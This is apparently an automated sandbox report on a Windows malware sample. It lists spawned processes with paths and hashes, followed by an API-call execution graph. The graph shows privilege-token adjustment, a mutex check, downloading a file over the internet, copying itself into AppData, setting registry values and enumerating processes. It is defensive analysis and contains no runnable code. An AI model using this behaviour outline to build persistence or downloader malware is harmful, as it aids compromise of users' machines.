                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:52
                                                                                                                                                                                                                                Start time:07:28:40
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff7c9b00000
                                                                                                                                                                                                                                File size:238'080 bytes
                                                                                                                                                                                                                                MD5 hash:839B3EFD5782B6FC122855665F3AA202
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:53
                                                                                                                                                                                                                                Start time:07:28:43
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\relog.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\relog.exe
                                                                                                                                                                                                                                Imagebase:0x7ff698010000
                                                                                                                                                                                                                                File size:53'760 bytes
                                                                                                                                                                                                                                MD5 hash:F445286ECB5A74AAF2C103D05879F1C1
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:54
                                                                                                                                                                                                                                Start time:07:28:52
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff7c9b00000
                                                                                                                                                                                                                                File size:238'080 bytes
                                                                                                                                                                                                                                MD5 hash:839B3EFD5782B6FC122855665F3AA202
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:55
                                                                                                                                                                                                                                Start time:07:28:54
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\relog.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\relog.exe
                                                                                                                                                                                                                                Imagebase:0x7ff698010000
                                                                                                                                                                                                                                File size:53'760 bytes
                                                                                                                                                                                                                                MD5 hash:F445286ECB5A74AAF2C103D05879F1C1
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:6.1%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                  Signature Coverage:29.5%
                                                                                                                                                                                                                                  Total number of Nodes:1988
                                                                                                                                                                                                                                  Total number of Limit Nodes:20
                                                                                                                                                                                                                                  execution_graph 14074 7ff68a18ef5c 14112 7ff68a19594c GetStartupInfoW 14074->14112 14076 7ff68a18ef70 14113 7ff68a19118c GetProcessHeap 14076->14113 14078 7ff68a18efd0 14079 7ff68a18eff6 14078->14079 14080 7ff68a18efe2 14078->14080 14081 7ff68a18efdd 14078->14081 14114 7ff68a1920cc 14079->14114 14197 7ff68a1909ec 14080->14197 14188 7ff68a190978 14081->14188 14088 7ff68a18f008 14091 7ff68a190978 _FF_MSGBANNER 68 API calls 14088->14091 14089 7ff68a18f00d 14090 7ff68a1909ec _NMSG_WRITE 68 API calls 14089->14090 14092 7ff68a18f017 14090->14092 14091->14089 14094 7ff68a18f2f4 malloc 3 API calls 14092->14094 14093 7ff68a18f021 _ioinit0 _RTC_Initialize 14095 7ff68a18f02c GetCommandLineW 14093->14095 14094->14093 14129 7ff68a196424 GetEnvironmentStringsW 14095->14129 14099 7ff68a18f04a 14100 7ff68a18f058 14099->14100 14240 7ff68a18f30c 14099->14240 14139 7ff68a19617c 14100->14139 14104 7ff68a18f06b 14156 7ff68a18f354 14104->14156 14105 7ff68a18f30c __updatetlocinfo 68 API calls 14105->14104 14107 7ff68a18f075 14108 7ff68a18f080 _wwincmdln 14107->14108 14109 7ff68a18f30c __updatetlocinfo 68 API calls 14107->14109 14162 7ff68a1889c4 GetModuleFileNameW 14108->14162 14109->14108 14112->14076 14113->14078 14247 7ff68a18f410 EncodePointer 14114->14247 14116 7ff68a1920d7 14250 7ff68a193e94 14116->14250 14118 7ff68a1920dc 14119 7ff68a19213e 14118->14119 14122 7ff68a1920f7 14118->14122 14268 7ff68a19214c 14119->14268 14254 7ff68a18f6c0 14122->14254 14125 7ff68a19210e FlsSetValue 14125->14119 14126 7ff68a192120 14125->14126 14259 7ff68a192010 14126->14259 14130 7ff68a19644a 14129->14130 14131 7ff68a18f03e 14129->14131 14132 7ff68a18f740 _malloc_crt 68 API calls 14130->14132 14135 7ff68a195ef4 GetModuleFileNameW 14131->14135 14134 7ff68a19646c _expandlocale 14132->14134 14133 7ff68a196485 FreeEnvironmentStringsW 14133->14131 14134->14133 14136 7ff68a195f34 wparse_cmdline 14135->14136 14137 7ff68a18f740 _malloc_crt 68 API calls 14136->14137 14138 7ff68a195f94 wparse_cmdline 14136->14138 14137->14138 14138->14099 14140 7ff68a1961af _expandlocale 14139->14140 14141 7ff68a18f05d 14139->14141 14142 7ff68a1961cf 14140->14142 14141->14104 14141->14105 14143 7ff68a18f6c0 _calloc_crt 68 API calls 14142->14143 14144 7ff68a1961df _expandlocale 14143->14144 14144->14141 14147 7ff68a196247 14144->14147 14148 7ff68a18f6c0 _calloc_crt 68 API calls 14144->14148 14149 7ff68a196287 14144->14149 14153 7ff68a19629f 14144->14153 14354 7ff68a191104 14144->14354 14145 7ff68a18c9c8 free 68 API calls 14146 7ff68a196256 14145->14146 14146->14141 14147->14145 14148->14144 14150 7ff68a18c9c8 free 68 API calls 14149->14150 14152 7ff68a196293 14150->14152 14152->14141 14363 7ff68a18fba4 14153->14363 14157 7ff68a18f36a _IsNonwritableInCurrentImage 14156->14157 14389 7ff68a1965d0 14157->14389 14159 7ff68a18f387 _initterm_e 14161 7ff68a18f3aa _IsNonwritableInCurrentImage 14159->14161 14392 7ff68a18c374 14159->14392 14161->14107 14163 7ff68a188a0e 14162->14163 14164 7ff68a1889fb PathFindFileNameW 14162->14164 14409 7ff68a18d264 14163->14409 14164->14163 14166 7ff68a188a75 _expandlocale 14171 7ff68a188ac9 ExitProcess 14166->14171 14172 7ff68a188a8a CreateMutexA 14166->14172 14167 7ff68a188a26 _expandlocale 14167->14166 14418 7ff68a18878c GetCurrentProcess OpenProcessToken 14167->14418 14174 7ff68a188ac3 14172->14174 14175 7ff68a188aa4 GetLastError 14172->14175 14178 7ff68a188878 226 API calls 14174->14178 14175->14174 14177 7ff68a188ab1 CloseHandle ExitProcess 14175->14177 14180 7ff68a188ac8 14178->14180 14180->14171 14182 7ff68a188a54 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 14476 7ff68a18384c LoadLibraryA 14182->14476 14185 7ff68a188a6f 14500 7ff68a188878 14185->14500 16427 7ff68a1962bc 14188->16427 14191 7ff68a190995 14193 7ff68a1909ec _NMSG_WRITE 68 API calls 14191->14193 14196 7ff68a1909b6 14191->14196 14192 7ff68a1962bc _set_error_mode 68 API calls 14192->14191 14194 7ff68a1909ac 14193->14194 14195 7ff68a1909ec _NMSG_WRITE 68 API calls 14194->14195 14195->14196 14196->14080 14198 7ff68a190a20 _NMSG_WRITE 14197->14198 14199 7ff68a1962bc _set_error_mode 65 API calls 14198->14199 14236 7ff68a190b5a 14198->14236 14201 7ff68a190a36 14199->14201 14200 7ff68a18bb20 _expandlocale 9 API calls 14202 7ff68a18efec 14200->14202 14203 7ff68a190b5c GetStdHandle 14201->14203 14204 7ff68a1962bc _set_error_mode 65 API calls 14201->14204 14237 7ff68a18f2f4 14202->14237 14207 7ff68a190b74 _cftof2_l 14203->14207 14203->14236 14205 7ff68a190a47 14204->14205 14205->14203 14206 7ff68a190a58 14205->14206 14209 7ff68a191104 _expandlocale 65 API calls 14206->14209 14206->14236 14208 7ff68a190bac WriteFile 14207->14208 14208->14236 14210 7ff68a190a83 14209->14210 14211 7ff68a190a8d GetModuleFileNameW 14210->14211 14232 7ff68a190c47 14210->14232 14212 7ff68a190ab2 14211->14212 14219 7ff68a190acb _expandlocale 14211->14219 14214 7ff68a191104 _expandlocale 65 API calls 14212->14214 14213 7ff68a18fba4 _invoke_watson 15 API calls 14215 7ff68a190c5a 14213->14215 14216 7ff68a190ac3 14214->14216 14217 7ff68a190bf4 14216->14217 14216->14219 14220 7ff68a18fba4 _invoke_watson 15 API calls 14217->14220 14218 7ff68a190b15 14221 7ff68a18c6bc _NMSG_WRITE 65 API calls 14218->14221 14219->14218 14223 7ff68a18d264 _expandlocale 65 API calls 14219->14223 14222 7ff68a190c08 14220->14222 14224 7ff68a190b27 14221->14224 14227 7ff68a18fba4 _invoke_watson 15 API calls 14222->14227 14229 7ff68a190b0d 14223->14229 14225 7ff68a190c32 14224->14225 14226 7ff68a18c6bc _NMSG_WRITE 65 API calls 14224->14226 14228 7ff68a18fba4 _invoke_watson 15 API calls 14225->14228 14230 7ff68a190b3d 14226->14230 14231 7ff68a190c1d 14227->14231 14228->14232 14229->14218 14229->14222 14230->14231 14233 7ff68a190b45 14230->14233 14235 7ff68a18fba4 _invoke_watson 15 API calls 14231->14235 14232->14213 16433 7ff68a196ac8 EncodePointer 14233->16433 14235->14225 14236->14200 16461 7ff68a18f2b0 GetModuleHandleExW 14237->16461 14241 7ff68a190978 _FF_MSGBANNER 68 API calls 14240->14241 14242 7ff68a18f319 14241->14242 14243 7ff68a1909ec _NMSG_WRITE 68 API calls 14242->14243 14244 7ff68a18f320 14243->14244 16464 7ff68a18f4e0 14244->16464 14248 7ff68a18f429 _init_pointers 14247->14248 14249 7ff68a194dcc EncodePointer 14248->14249 14249->14116 14251 7ff68a193eaf 14250->14251 14252 7ff68a193eb5 InitializeCriticalSectionAndSpinCount 14251->14252 14253 7ff68a193ee0 14251->14253 14252->14251 14253->14118 14255 7ff68a18f6e5 14254->14255 14257 7ff68a18f722 14255->14257 14258 7ff68a18f703 Sleep 14255->14258 14275 7ff68a19693c 14255->14275 14257->14119 14257->14125 14258->14255 14258->14257 14305 7ff68a193d0c 14259->14305 14269 7ff68a19215b 14268->14269 14270 7ff68a193d9e 14269->14270 14271 7ff68a193d80 DeleteCriticalSection 14269->14271 14273 7ff68a193db3 DeleteCriticalSection 14270->14273 14274 7ff68a18effb 14270->14274 14272 7ff68a18c9c8 free 68 API calls 14271->14272 14272->14269 14273->14270 14274->14088 14274->14089 14274->14093 14276 7ff68a196951 14275->14276 14281 7ff68a19696e 14275->14281 14277 7ff68a19695f 14276->14277 14276->14281 14283 7ff68a190908 14277->14283 14278 7ff68a196986 HeapAlloc 14280 7ff68a196964 14278->14280 14278->14281 14280->14255 14281->14278 14281->14280 14286 7ff68a190fa4 DecodePointer 14281->14286 14288 7ff68a191f8c GetLastError 14283->14288 14285 7ff68a190911 14285->14280 14287 7ff68a190fbf 14286->14287 14287->14281 14289 7ff68a191fa9 14288->14289 14290 7ff68a191ff8 SetLastError 14289->14290 14291 7ff68a18f6c0 _calloc_crt 65 API calls 14289->14291 14290->14285 14292 7ff68a191fbe 14291->14292 14292->14290 14293 7ff68a191ff1 14292->14293 14294 7ff68a191fdb 14292->14294 14299 7ff68a18c9c8 14293->14299 14295 7ff68a192010 _initptd 65 API calls 14294->14295 14297 7ff68a191fe2 GetCurrentThreadId 14295->14297 14297->14290 14298 7ff68a191ff6 14298->14290 14300 7ff68a18c9cd HeapFree 14299->14300 14304 7ff68a18c9fd realloc 14299->14304 14301 7ff68a18c9e8 14300->14301 14300->14304 14302 7ff68a190908 _errno 66 API calls 14301->14302 14303 7ff68a18c9ed GetLastError 14302->14303 14303->14304 14304->14298 14306 7ff68a193d2a 14305->14306 14307 7ff68a193d3b EnterCriticalSection 14305->14307 14311 7ff68a193dd8 14306->14311 14310 7ff68a18f30c __updatetlocinfo 67 API calls 14310->14307 14312 7ff68a193e0e 14311->14312 14313 7ff68a193df5 14311->14313 14314 7ff68a193d2f 14312->14314 14332 7ff68a18f740 14312->14332 14315 7ff68a190978 _FF_MSGBANNER 66 API calls 14313->14315 14314->14307 14314->14310 14317 7ff68a193dfa 14315->14317 14319 7ff68a1909ec _NMSG_WRITE 66 API calls 14317->14319 14322 7ff68a193e04 14319->14322 14320 7ff68a193e47 14324 7ff68a193d0c _lock 66 API calls 14320->14324 14321 7ff68a193e38 14323 7ff68a190908 _errno 66 API calls 14321->14323 14325 7ff68a18f2f4 malloc 3 API calls 14322->14325 14323->14314 14326 7ff68a193e51 14324->14326 14325->14312 14327 7ff68a193e5c InitializeCriticalSectionAndSpinCount 14326->14327 14328 7ff68a193e6d 14326->14328 14329 7ff68a193e73 LeaveCriticalSection 14327->14329 14330 7ff68a18c9c8 free 66 API calls 14328->14330 14329->14314 14331 7ff68a193e72 14330->14331 14331->14329 14333 7ff68a18f768 14332->14333 14335 7ff68a18f79d 14333->14335 14336 7ff68a18f77c Sleep 14333->14336 14337 7ff68a18ca08 14333->14337 14335->14320 14335->14321 14336->14333 14336->14335 14338 7ff68a18ca9c 14337->14338 14351 7ff68a18ca20 14337->14351 14339 7ff68a190fa4 _callnewh DecodePointer 14338->14339 14341 7ff68a18caa1 14339->14341 14340 7ff68a18ca58 RtlAllocateHeap 14344 7ff68a18ca91 14340->14344 14340->14351 14343 7ff68a190908 _errno 67 API calls 14341->14343 14342 7ff68a190978 _FF_MSGBANNER 67 API calls 14350 7ff68a18ca38 14342->14350 14343->14344 14344->14333 14345 7ff68a18ca81 14346 7ff68a190908 _errno 67 API calls 14345->14346 14349 7ff68a18ca86 14346->14349 14347 7ff68a1909ec _NMSG_WRITE 67 API calls 14347->14350 14348 7ff68a190fa4 _callnewh DecodePointer 14348->14351 14353 7ff68a190908 _errno 67 API calls 14349->14353 14350->14340 14350->14342 14350->14347 14352 7ff68a18f2f4 malloc 3 API calls 14350->14352 14351->14340 14351->14345 14351->14348 14351->14349 14351->14350 14352->14350 14353->14344 14355 7ff68a19111c 14354->14355 14356 7ff68a191112 14354->14356 14357 7ff68a190908 _errno 68 API calls 14355->14357 14356->14355 14361 7ff68a191139 14356->14361 14358 7ff68a191125 14357->14358 14368 7ff68a18fb84 14358->14368 14360 7ff68a191131 14360->14144 14361->14360 14362 7ff68a190908 _errno 68 API calls 14361->14362 14362->14358 14364 7ff68a18fbb2 14363->14364 14377 7ff68a18fa20 14364->14377 14371 7ff68a18fb1c DecodePointer 14368->14371 14372 7ff68a18fb5a 14371->14372 14373 7ff68a18fba4 _invoke_watson 15 API calls 14372->14373 14374 7ff68a18fb80 14373->14374 14375 7ff68a18fb1c _invalid_parameter_noinfo 15 API calls 14374->14375 14376 7ff68a18fb9d 14375->14376 14376->14360 14378 7ff68a18fa5b __raise_securityfailure _cftof2_l 14377->14378 14385 7ff68a195848 RtlCaptureContext RtlLookupFunctionEntry 14378->14385 14386 7ff68a195878 RtlVirtualUnwind 14385->14386 14387 7ff68a18fa93 IsDebuggerPresent 14385->14387 14386->14387 14388 7ff68a195a00 SetUnhandledExceptionFilter UnhandledExceptionFilter 14387->14388 14390 7ff68a1965e3 EncodePointer 14389->14390 14390->14390 14391 7ff68a1965fe 14390->14391 14391->14159 14395 7ff68a18c268 14392->14395 14408 7ff68a18f4c8 14395->14408 14413 7ff68a18d271 14409->14413 14410 7ff68a18d276 14411 7ff68a190908 _errno 68 API calls 14410->14411 14412 7ff68a18d27b 14410->14412 14417 7ff68a18d2a0 14411->14417 14412->14167 14413->14410 14413->14412 14415 7ff68a18d2b4 14413->14415 14414 7ff68a18fb84 _invalid_parameter_noinfo 16 API calls 14414->14412 14415->14412 14416 7ff68a190908 _errno 68 API calls 14415->14416 14416->14417 14417->14414 14419 7ff68a1887c2 GetTokenInformation 14418->14419 14420 7ff68a188865 14418->14420 14421 7ff68a18ca08 malloc 68 API calls 14419->14421 14519 7ff68a18bb20 14420->14519 14424 7ff68a1887ef GetTokenInformation 14421->14424 14425 7ff68a188852 FindCloseChangeNotification 14424->14425 14426 7ff68a188818 AdjustTokenPrivileges 14424->14426 14428 7ff68a18c9c8 free 68 API calls 14425->14428 14426->14425 14428->14420 14429 7ff68a18831c GetTempPathW 14430 7ff68a188350 14429->14430 14431 7ff68a188349 14429->14431 14538 7ff68a18c6bc 14430->14538 14434 7ff68a18bb20 _expandlocale 9 API calls 14431->14434 14436 7ff68a1883df 14434->14436 14435 7ff68a188387 14547 7ff68a187a94 14435->14547 14442 7ff68a182dbc 14436->14442 14439 7ff68a188398 SHGetFolderPathW 14439->14431 14440 7ff68a1883bb 14439->14440 14562 7ff68a187f1c 14440->14562 14798 7ff68a1829c8 GetModuleFileNameW 14442->14798 14445 7ff68a182df8 GetModuleFileNameW RegOpenKeyExW 14447 7ff68a182e29 14445->14447 14448 7ff68a182e3f SHGetFolderPathW 14445->14448 14446 7ff68a182e85 GetModuleFileNameW RegOpenKeyExW 14449 7ff68a182ecc SHGetFolderPathW 14446->14449 14450 7ff68a182eb6 14446->14450 14452 7ff68a182ad0 2 API calls 14447->14452 14453 7ff68a182e61 14448->14453 14456 7ff68a182e79 14448->14456 14451 7ff68a182eee 14449->14451 14449->14456 14454 7ff68a182ad0 2 API calls 14450->14454 14455 7ff68a182b28 11 API calls 14451->14455 14452->14448 14804 7ff68a182b28 14453->14804 14454->14449 14455->14456 14812 7ff68a182c70 14456->14812 14462 7ff68a18bb20 _expandlocale 9 API calls 14463 7ff68a182f2b 14462->14463 14464 7ff68a1878f0 14463->14464 14465 7ff68a187939 _cftof2_l 14464->14465 14836 7ff68a187718 GetWindowsDirectoryA GetVolumeInformationA 14465->14836 14468 7ff68a187980 lstrcatA lstrcatA CreateDirectoryA 14469 7ff68a1879b3 GetLastError 14468->14469 14470 7ff68a1879c0 6 API calls 14468->14470 14469->14470 14471 7ff68a187962 14469->14471 14470->14471 14841 7ff68a181808 14471->14841 14473 7ff68a187a6b 14474 7ff68a18bb20 _expandlocale 9 API calls 14473->14474 14475 7ff68a187a7d 14474->14475 14475->14182 14477 7ff68a18388b GetProcAddress 14476->14477 14478 7ff68a183a38 14476->14478 14477->14478 14479 7ff68a1838a4 GetProcAddress 14477->14479 14481 7ff68a18bb20 _expandlocale 9 API calls 14478->14481 14479->14478 14480 7ff68a1838c4 GetProcAddress 14479->14480 14480->14478 14482 7ff68a1838e4 GetProcAddress 14480->14482 14483 7ff68a183a4b 14481->14483 14484 7ff68a18395b GetModuleFileNameW 14482->14484 14485 7ff68a183900 GetProcAddress 14482->14485 14483->14166 14483->14185 14879 7ff68a195a30 14484->14879 14485->14484 14486 7ff68a18391c GetProcAddress 14485->14486 14486->14484 14488 7ff68a183938 GetProcAddress 14486->14488 14488->14484 14490 7ff68a183954 14488->14490 14490->14484 14493 7ff68a1839eb CloseHandle 14907 7ff68a1832a8 14493->14907 15325 7ff68a1856f8 14500->15325 14503 7ff68a183e70 70 API calls 14504 7ff68a1888d4 14503->14504 14505 7ff68a183e70 70 API calls 14504->14505 14506 7ff68a1888f7 14505->14506 15368 7ff68a18731c 14506->15368 14509 7ff68a183e70 70 API calls 14510 7ff68a18893d 14509->14510 14511 7ff68a183e70 70 API calls 14510->14511 14512 7ff68a188960 14511->14512 14513 7ff68a18731c 21 API calls 14512->14513 14514 7ff68a188975 14513->14514 15384 7ff68a185ac0 CreateToolhelp32Snapshot 14514->15384 14518 7ff68a1889bb 15588 7ff68a1883e8 14518->15588 14520 7ff68a18bb29 14519->14520 14521 7ff68a188872 14520->14521 14522 7ff68a18e988 IsProcessorFeaturePresent 14520->14522 14521->14429 14523 7ff68a18e99f 14522->14523 14528 7ff68a1958b8 RtlCaptureContext 14523->14528 14529 7ff68a1958d2 RtlLookupFunctionEntry 14528->14529 14530 7ff68a18e9b2 14529->14530 14531 7ff68a1958e8 RtlVirtualUnwind 14529->14531 14532 7ff68a18e93c IsDebuggerPresent 14530->14532 14531->14529 14531->14530 14533 7ff68a18e95b __raise_securityfailure 14532->14533 14537 7ff68a195a00 SetUnhandledExceptionFilter UnhandledExceptionFilter 14533->14537 14539 7ff68a18c6d7 14538->14539 14542 7ff68a18c6cd 14538->14542 14540 7ff68a190908 _errno 68 API calls 14539->14540 14541 7ff68a18c6e0 14540->14541 14543 7ff68a18fb84 _invalid_parameter_noinfo 16 API calls 14541->14543 14542->14539 14545 7ff68a18c70e 14542->14545 14544 7ff68a188366 InternetOpenW 14543->14544 14544->14431 14544->14435 14545->14544 14546 7ff68a190908 _errno 68 API calls 14545->14546 14546->14541 14583 7ff68a199600 14547->14583 14550 7ff68a187b25 CreateFileW 14553 7ff68a187b5b InternetCloseHandle 14550->14553 14554 7ff68a187b63 14550->14554 14551 7ff68a187aee InternetOpenUrlW 14551->14550 14552 7ff68a187b15 InternetCloseHandle 14551->14552 14555 7ff68a187bdc 14552->14555 14553->14552 14556 7ff68a187b9e InternetReadFile 14554->14556 14558 7ff68a187bbc CloseHandle InternetCloseHandle InternetCloseHandle 14554->14558 14560 7ff68a187b74 WriteFile 14554->14560 14561 7ff68a187bb8 14554->14561 14557 7ff68a18bb20 _expandlocale 9 API calls 14555->14557 14556->14554 14556->14561 14559 7ff68a187bec 14557->14559 14558->14555 14559->14431 14559->14439 14560->14554 14560->14561 14561->14558 14563 7ff68a187f7e 14562->14563 14585 7ff68a183c1c 14563->14585 14565 7ff68a187f9a 14596 7ff68a18afb8 14565->14596 14567 7ff68a187fb0 FindFirstFileW 14576 7ff68a187fd4 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 14567->14576 14569 7ff68a1882ef 14571 7ff68a18bb20 _expandlocale 9 API calls 14569->14571 14570 7ff68a1882ce FindNextFileW 14573 7ff68a1882e6 FindClose 14570->14573 14570->14576 14572 7ff68a1882fe 14571->14572 14572->14431 14573->14569 14574 7ff68a183c1c 70 API calls 14574->14576 14575 7ff68a18afb8 70 API calls 14575->14576 14576->14569 14576->14570 14576->14574 14576->14575 14577 7ff68a18818e CopyFileW 14576->14577 14579 7ff68a18821e RegOpenKeyExW 14576->14579 14599 7ff68a18b004 14576->14599 14613 7ff68a182ad0 14576->14613 14618 7ff68a187c00 14576->14618 14577->14576 14579->14576 14584 7ff68a187aa6 InternetOpenUrlW 14583->14584 14584->14550 14584->14551 14586 7ff68a183c96 14585->14586 14590 7ff68a183c40 14585->14590 14587 7ff68a183ca9 14586->14587 14588 7ff68a183d2f 14586->14588 14594 7ff68a183c91 _expandlocale 14587->14594 14655 7ff68a184138 14587->14655 14661 7ff68a19ae30 14588->14661 14590->14586 14593 7ff68a183c6b 14590->14593 14639 7ff68a183e70 14593->14639 14594->14565 14717 7ff68a183aa4 14596->14717 14598 7ff68a18afd9 14598->14567 14603 7ff68a18b031 14599->14603 14600 7ff68a18b08d 14601 7ff68a18b18e 14600->14601 14602 7ff68a18b0a2 14600->14602 14606 7ff68a19ae30 _RunAllParam 70 API calls 14601->14606 14604 7ff68a18b0b9 14602->14604 14605 7ff68a18b19a 14602->14605 14603->14600 14610 7ff68a18b060 14603->14610 14608 7ff68a184138 70 API calls 14604->14608 14612 7ff68a18b085 _expandlocale 14604->14612 14607 7ff68a19ae30 _RunAllParam 70 API calls 14605->14607 14606->14605 14609 7ff68a18b1a7 14607->14609 14608->14612 14744 7ff68a18b2c8 14610->14744 14612->14576 14614 7ff68a182ae1 14613->14614 14614->14614 14615 7ff68a182aea RegSetValueExW 14614->14615 14616 7ff68a182b15 RegCloseKey 14615->14616 14617 7ff68a182b12 14615->14617 14616->14576 14617->14616 14622 7ff68a187c56 14618->14622 14757 7ff68a188df8 14622->14757 14624 7ff68a187d5a 14770 7ff68a18a920 14624->14770 14625 7ff68a187d3c 14625->14624 14781 7ff68a18a6f8 14625->14781 14627 7ff68a187d34 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 14628 7ff68a18bb20 _expandlocale 9 API calls 14627->14628 14630 7ff68a187efd SetFileAttributesW 14628->14630 14630->14576 14633 7ff68a187dac 14634 7ff68a18afb8 70 API calls 14633->14634 14636 7ff68a187dc0 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 14634->14636 14635 7ff68a187df0 CoInitialize CoCreateInstance 14637 7ff68a187e9d CoUninitialize 14635->14637 14638 7ff68a187e2b 14635->14638 14636->14635 14637->14627 14638->14637 14640 7ff68a183f88 14639->14640 14641 7ff68a183e9f 14639->14641 14671 7ff68a19ae68 14640->14671 14643 7ff68a183edf 14641->14643 14644 7ff68a183eae 14641->14644 14645 7ff68a183fa1 14643->14645 14646 7ff68a183ef2 14643->14646 14647 7ff68a183f94 14644->14647 14648 7ff68a183ebc 14644->14648 14649 7ff68a19ae30 _RunAllParam 70 API calls 14645->14649 14652 7ff68a184138 70 API calls 14646->14652 14654 7ff68a183eda _expandlocale 14646->14654 14650 7ff68a19ae68 70 API calls 14647->14650 14666 7ff68a184088 14648->14666 14651 7ff68a183fae 14649->14651 14650->14645 14652->14654 14654->14594 14657 7ff68a184176 14655->14657 14656 7ff68a1841d1 14660 7ff68a1841de _expandlocale std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 14656->14660 14709 7ff68a19adec 14656->14709 14657->14656 14657->14660 14699 7ff68a18c51c 14657->14699 14660->14594 14662 7ff68a18bb90 std::exception::exception 68 API calls 14661->14662 14663 7ff68a19ae48 14662->14663 14664 7ff68a190fe0 _CxxThrowException 2 API calls 14663->14664 14665 7ff68a19ae65 14664->14665 14667 7ff68a18412b 14666->14667 14670 7ff68a1840aa _expandlocale 14666->14670 14668 7ff68a19ae68 70 API calls 14667->14668 14669 7ff68a184137 14668->14669 14670->14654 14676 7ff68a18bb90 14671->14676 14675 7ff68a19ae9d 14684 7ff68a18bc98 14676->14684 14679 7ff68a190fe0 14680 7ff68a191060 RtlPcToFileHeader 14679->14680 14681 7ff68a191050 14679->14681 14682 7ff68a1910a0 RaiseException 14680->14682 14683 7ff68a191085 14680->14683 14681->14680 14682->14675 14683->14682 14685 7ff68a18bc9d _cftof2_l 14684->14685 14688 7ff68a18bbb4 14684->14688 14686 7ff68a18ca08 malloc 68 API calls 14685->14686 14687 7ff68a18bcc6 14686->14687 14687->14688 14690 7ff68a18eef8 14687->14690 14688->14679 14691 7ff68a18ef0d 14690->14691 14692 7ff68a18ef03 14690->14692 14693 7ff68a190908 _errno 68 API calls 14691->14693 14692->14691 14697 7ff68a18ef29 14692->14697 14694 7ff68a18ef15 14693->14694 14695 7ff68a18fb84 _invalid_parameter_noinfo 16 API calls 14694->14695 14696 7ff68a18ef21 14695->14696 14696->14688 14697->14696 14698 7ff68a190908 _errno 68 API calls 14697->14698 14698->14694 14702 7ff68a18c527 14699->14702 14700 7ff68a18ca08 malloc 68 API calls 14700->14702 14701 7ff68a18c540 14701->14656 14702->14700 14702->14701 14703 7ff68a190fa4 _callnewh DecodePointer 14702->14703 14704 7ff68a18c546 std::_Xbad_alloc 14702->14704 14703->14702 14705 7ff68a190fe0 _CxxThrowException 2 API calls 14704->14705 14706 7ff68a18c584 14705->14706 14713 7ff68a18bc08 14706->14713 14708 7ff68a18c5a6 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 14708->14656 14710 7ff68a19ae11 std::_Xbad_alloc 14709->14710 14711 7ff68a190fe0 _CxxThrowException 2 API calls 14710->14711 14712 7ff68a19ae2e 14711->14712 14714 7ff68a18bcf4 14713->14714 14715 7ff68a18bd0c 14714->14715 14716 7ff68a18c9c8 free 68 API calls 14714->14716 14715->14708 14716->14715 14721 7ff68a183ad0 14717->14721 14718 7ff68a183b3c 14719 7ff68a183b4c 14718->14719 14720 7ff68a183bff 14718->14720 14724 7ff68a183c0b 14719->14724 14725 7ff68a183b6c 14719->14725 14730 7ff68a183b34 _expandlocale 14719->14730 14722 7ff68a19ae30 _RunAllParam 70 API calls 14720->14722 14721->14718 14723 7ff68a183b0f 14721->14723 14722->14724 14731 7ff68a183d3c 14723->14731 14726 7ff68a19ae30 _RunAllParam 70 API calls 14724->14726 14727 7ff68a184138 70 API calls 14725->14727 14725->14730 14728 7ff68a183c18 14726->14728 14727->14730 14730->14598 14732 7ff68a183d6d 14731->14732 14733 7ff68a183e46 14731->14733 14735 7ff68a183d8b 14732->14735 14736 7ff68a183e52 14732->14736 14734 7ff68a19ae68 70 API calls 14733->14734 14734->14736 14738 7ff68a183e5f 14735->14738 14739 7ff68a183dae 14735->14739 14743 7ff68a183dbc _expandlocale 14735->14743 14737 7ff68a19ae30 _RunAllParam 70 API calls 14736->14737 14737->14738 14740 7ff68a19ae30 _RunAllParam 70 API calls 14738->14740 14741 7ff68a184138 70 API calls 14739->14741 14739->14743 14742 7ff68a183e6c 14740->14742 14741->14743 14743->14730 14745 7ff68a18b2f6 